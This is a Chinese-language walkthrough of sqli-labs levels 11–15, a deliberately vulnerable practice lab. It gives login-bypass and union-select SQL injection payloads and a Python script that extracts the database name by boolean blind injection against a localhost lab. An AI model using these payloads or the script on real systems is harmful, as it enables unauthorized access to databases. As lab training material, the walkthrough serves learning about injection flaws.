Sqli-labs11-15 (附盲注獲取資料庫長度和名字的指令碼)
第十一題 報錯
這裡寫程式碼片
一個登陸介面
這是登陸成功
使用者名稱輸入單引號報錯
猜測是
select * from users where username='$name' and password='$password'
閉合
select * from users where username=' 'or 1=1 # ' and password='$password'
要將後面的and註釋掉 不然語句就是或者 1=1並且密碼等於這個了。
payload就是
username=’ or 1=1 #
閉合了前面對使用者名稱的判斷,註釋了後面對密碼的判斷。使用 or 或者 1=1 肯定是對的。就可以登陸成功了。
看到頁面上面有兩個顯示的使用者名稱和密碼的,但是還是要使用 order by測試下查詢了幾個資料並顯示
確實是兩個,order by 3的時候報錯。沒有第三個欄位當然就不能以第三個欄位排序了
讓其回顯資料,直接
第十二題 雙引號報錯
雙引號報錯
這個顏色真的辣眼睛
根據報錯資訊
猜測應該是 加了括號
select * from users where username=(“$username”) and password….
直接閉合 雙引號和括號
username
")or 1=1#
閉合雙引號和括號在 1=1註釋密碼~
uname=") union select database(),version()#&passwd=1
第十三題 單引號報錯
單引號報錯
閉合payload
')or 1=1 #
or (substr((select database()),1,1)='s'
可以布林盲注
payload
uname=' )or (select substr((select database()),1,1))='s' # &passwd=1
寫個指令碼
獲取資料庫名長度
uname=' ) or length((select database()))=8 #&passwd=1
import requests
#uname=' )or (select substr((select database()),1,1))='s' # &passwd=1
url = "http://localhost/sqli-labs/Less-13/";
name =""
database_length=0
#正確的話就存在 flag.jpg
database_length_payload = "uname=' ) or length((select database()))={0} #"
database_name_payload = "uname=' )or (select substr((select database()),{0},1))='{1}' # &passwd=1"
def get_response(payload,value,*args):
if len(args)==0:
payload=payload.format(value)
data = {'uname': payload, 'passwd': '1'}
else:
payload = payload.format(value,args[0])
data = {'uname': payload, 'passwd': '1'}
print(data)
html = requests.post(url, data=data)
if "flag.jpg" in html.text:
return True
else:
return False
for n in range(100):
if get_response(database_length_payload,n):
print("[+] database_length is {0}".format(n) )
database_length=n
break
for nn in range(1,database_length+1):
for v in "qwertyuioplkjhgfdsazxcvbnm":
if get_response(database_name_payload,nn,v):
name =name+v
print("[+] database name is {0}".format(name))
break
print("[*] database name is {0}".format(name))
第十四題 雙引號報錯
雙引號報錯
閉合繞過
" or 1=1 #
//寫了一堆是繞過登陸的。。。。應該獲取資料庫資訊才行~!~!!!
十四題使用十三題的去掉括號,單引號換成雙引號
修改payload直接上面的指令碼跑獲取資料庫資訊
第十五題 單引號報錯
單引號報錯,還是之前的指令碼修改 payload
相關推薦
Sqli-labs11-15 (附盲注獲取資料庫長度和名字的指令碼)
第十一題 報錯 這裡寫程式碼片 一個登陸介面 這是登陸成功 使用者名稱輸入單引號報錯 猜測是 select * from users where username='$name' and password='$password'
第九屆極客大挑戰——Geek Chatroom(sql盲注)
引言:因為太想加入三葉草了,所以極客大挑戰這段時間一直在努力的學習,原來還真沒想到能在比賽中拿到排行榜第一的成績,不過現在看來努力始終都是有回報的。但我依然還是比較菜啊-.-,最近卻有很多夥伴加我好友,一來就叫我大佬,讓我深感有愧-.-,既然都想看我wp,那我就挑幾道題寫寫好了,口拙詞劣還望見諒。
sqli-labs—————Sql注入之盲注講解
盲注何為盲注?盲注就是在sql注入過程中,sql語句執行的選擇後,選擇的資料不能回顯到前端頁面。此時,我們需要利用一些方法進行判斷或者嘗試,這個過程稱之為盲注。盲注分為三類•基於布林SQL盲注•基於時間的SQL盲注•基於報錯的SQL盲注1、基於布林SQL盲注————構造邏輯判
selenium之使用chrome瀏覽器測試(附chromedriver與chrome的對應關系表)(轉)
clas color csdn col bsp The chrome 文件解壓 info https://www.cnblogs.com/JHblogs/p/7699951.html 使用WebDriver在Chrome瀏覽器上進行測試時,需要從http://chrom
用Python和NetCore、Shell分別開發一個Ubuntu版的定時提醒(附NetCore跨平臺的兩種發布方式)
not 代碼 程序 異常 read bsp install dia alt Python3 與 C# 基礎語法對比:https://www.cnblogs.com/dotnetcrazy/p/9102030.html 平時經常用定時提醒來提高工作效率,到了Linux。。
AI---Anaconda For Linux (附C#交互式編程的引入)
興趣 圖片 color 新手 win ron cnblogs ctr 鏡像 Jupyter美化: https://www.cnblogs.com/dotnetcrazy/p/8760189.html win版本的安裝太簡單就不說了,一步步就OK了,這段時間開發環境都是li
安裝Ubuntu Server18.04(附與CentOS占用體積和Python版本的對比)
blog 版本 自帶 17. 安裝 系統 inux 8.0 png 這邊只演示一下最新系統的安裝過程,設置之類的和以前講的Kali以及CentOS大同小異:https://www.cnblogs.com/dunitian/p/4822808.html#linux
《TCP IP詳解卷:協議 原書第2版》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《演算法導論中文版》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《Hadoop權威指南大資料的儲存與分析第版修訂版升級版》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《Netty權威指南(第2版)》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《深入理解計算機系統(原書第三版)》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《圖解HTTP 彩色版》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《現代作業系統(第三版)中文版》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《ThinkinginJavathEdition(JAVA程式設計思想 第四版 英文版)》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《Spring in action 中文版(第4版)》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《HTMLCSS設計與構建網站》(中文版)》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《你不知道的 JavaScript(上中下卷)》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
《Kubernetes權威指南:從Docker到Kubernetes實踐全接觸》pdf附網盤下載連結+(附一個菜鳥的java學習之路)
技術書閱讀方法論 一.速讀一遍(最好在1~2天內完成) 人的大腦記憶力有限,在一天內快速看完一本書會在大腦裡留下深刻印象,對於之後複習以及總結都會有特別好的作用。 對於每一章的知識,先閱讀標題,弄懂大概講的是什麼主題,再去快速看一遍,不懂也沒有關係,但是一定要在不懂的
虛擬機器VMware Workstation Pro下安裝ubuntu-14.04.4(64位)方法(附ubuntu-14.04-desktop-amd64.iso下載連結)
ubuntu-14.04-desktop-amd64.iso下載: 連結:http://pan.baidu.com/s/1bFi0d4 密碼:yx0l 零基礎linux使用入門教學視訊分享: 連結:http://pan.baidu.com/s/1kU4GKWB 密碼